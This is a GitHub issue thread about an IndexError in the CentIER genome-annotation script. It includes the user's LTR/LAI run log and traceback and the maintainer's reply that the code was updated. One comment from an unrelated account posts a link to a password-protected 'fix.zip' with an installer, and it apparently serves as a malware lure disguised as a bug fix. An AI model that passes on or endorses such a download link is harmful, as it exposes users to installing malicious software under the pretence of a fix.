### ISSUE TITLE
IndexError: list index out of range

### ISSUE THREAD

**Issue by GooLey1025** [simon19891216/CentIER#16]
```
Parameters: -genome Zlat.fasta -intact Zlat.fasta.pass.list -all Zlat.fasta.out 
-t 60 -q -blast /public/home/cszx_huangxh/biosoftwares/Anaconda3_8/envs/gene_ann
o/bin/
2024年 08月 26日 星期一 21:25:13 CST    Dependency checking: Passed!
2024年 08月 26日 星期一 21:25:13 CST    Calculation of LAI will be based on the 
whole genome.
                                Please use the -mono parameter if your genome is
 a recent ployploid, otherwise high identity between LTR homeologues will overco
rrect raw LAI scores and result in low LAI.
2024年 08月 26日 星期一 21:25:13 CST    Estimate the identity of LTR sequences i
n the genome: quick mode
2024年 08月 26日 星期一 21:31:37 CST    The identity of LTR sequences: 91.256768
3309739%

                                【Warning】 The identity drops below the safe li
mit. Instead, identity of 92% will be used for LAI adjustment.

2024年 08月 26日 星期一 21:31:37 CST    Calculate LAI:

                                                Done!
2024年 08月 26日 星期一 21:31:44 CST    Result file: Zlat.fasta.out.LAI

                                You may use either raw_LAI or LAI for intraspeci
fic comparison
                                but please use ONLY LAI for interspecific compar
ison

2024年 08月 26日 星期一 21:31:44 CST    All analyses were finished!

##############################
####### Result files #########
##############################

Table output for intact LTR-RTs (detailed info)
        Zlat.fasta.pass.list (All LTR-RTs)
        Zlat.fasta.nmtf.pass.list (Non-TGCA LTR-RTs)
        Zlat.fasta.pass.list.gff3 (GFF3 format for intact LTR-RTs)

LTR-RT library
        Zlat.fasta.LTRlib.redundant.fa (All LTR-RTs with redundancy)
        Zlat.fasta.LTRlib.fa (All non-redundant LTR-RTs)
        Zlat.fasta.nmtf.LTRlib.fa (Non-TGCA LTR-RTs)

Whole-genome LTR-RT annotation by the non-redundant library
        Zlat.fasta.LTR.gff3 (GFF3 format)
        Zlat.fasta.out.fam.size.list (LTR family summary)
        Zlat.fasta.out.superfam.size.list (LTR superfamily summary)

LTR Assembly Index (LAI)
        Zlat.fasta.out.LAI

None
Folder './CentIER_final_results' already exists. Skipping creation.
Searching for tandem repeat sequences
searching for all LTRs of the input genome
Traceback (most recent call last):
  File "/centIER.py", line 831, in <module>
    thre=confidence[1];max_thre=confidence[0]
IndexError: list index out of range
```
Seeing the warning ,Does the error happen to my fasta file ?  Do i need to set some paramaters ? The command line of this is deault : centIER.py  myseq.fasta . without other added parameters.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GooLey1025** [comment]
what do you mean , bro

**Comment by GooLey1025** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

WHAT do you mean , bro

**Comment by simon19891216** [comment]
the code has been updated. please try again!



At 2024-08-26 22:12:55, "GooLey1025" ***@***.***> wrote:

Parameters: -genome Zlat.fasta -intact Zlat.fasta.pass.list -all Zlat.fasta.out 
-t 60 -q -blast /public/home/cszx_huangxh/biosoftwares/Anaconda3_8/envs/gene_ann
o/bin/
2024年 08月 26日 星期一 21:25:13 CST    Dependency checking: Passed!
2024年 08月 26日 星期一 21:25:13 CST    Calculation of LAI will be based on the 
whole genome.
                                Please use the -mono parameter if your genome is
 a recent ployploid, otherwise high identity between LTR homeologues will overco
rrect raw LAI scores and result in low LAI.
2024年 08月 26日 星期一 21:25:13 CST    Estimate the identity of LTR sequences i
n the genome: quick mode
2024年 08月 26日 星期一 21:31:37 CST    The identity of LTR sequences: 91.256768
3309739%

                                【Warning】 The identity drops below the safe li
mit. Instead, identity of 92% will be used for LAI adjustment.

2024年 08月 26日 星期一 21:31:37 CST    Calculate LAI:

                                                Done!
2024年 08月 26日 星期一 21:31:44 CST    Result file: Zlat.fasta.out.LAI

                                You may use either raw_LAI or LAI for intraspeci
fic comparison
                                but please use ONLY LAI for interspecific compar
ison

2024年 08月 26日 星期一 21:31:44 CST    All analyses were finished!

##############################
####### Result files #########
##############################

Table output for intact LTR-RTs (detailed info)
        Zlat.fasta.pass.list (All LTR-RTs)
        Zlat.fasta.nmtf.pass.list (Non-TGCA LTR-RTs)
        Zlat.fasta.pass.list.gff3 (GFF3 format for intact LTR-RTs)

LTR-RT library
        Zlat.fasta.LTRlib.redundant.fa (All LTR-RTs with redundancy)
        Zlat.fasta.LTRlib.fa (All non-redundant LTR-RTs)
        Zlat.fasta.nmtf.LTRlib.fa (Non-TGCA LTR-RTs)

Whole-genome LTR-RT annotation by the non-redundant library
        Zlat.fasta.LTR.gff3 (GFF3 format)
        Zlat.fasta.out.fam.size.list (LTR family summary)
        Zlat.fasta.out.superfam.size.list (LTR superfamily summary)

LTR Assembly Index (LAI)
        Zlat.fasta.out.LAI

None
Folder './CentIER_final_results' already exists. Skipping creation.
Searching for tandem repeat sequences
searching for all LTRs of the input genome
Traceback (most recent call last):
  File "/centIER.py", line 831, in <module>
    thre=confidence[1];max_thre=confidence[0]
IndexError: list index out of range


Seeing the warning ,Does the error happen to my fasta file ? Do i need to set some paramaters ? The command line of this is deault : centIER.py myseq.fasta . without other added parameters.
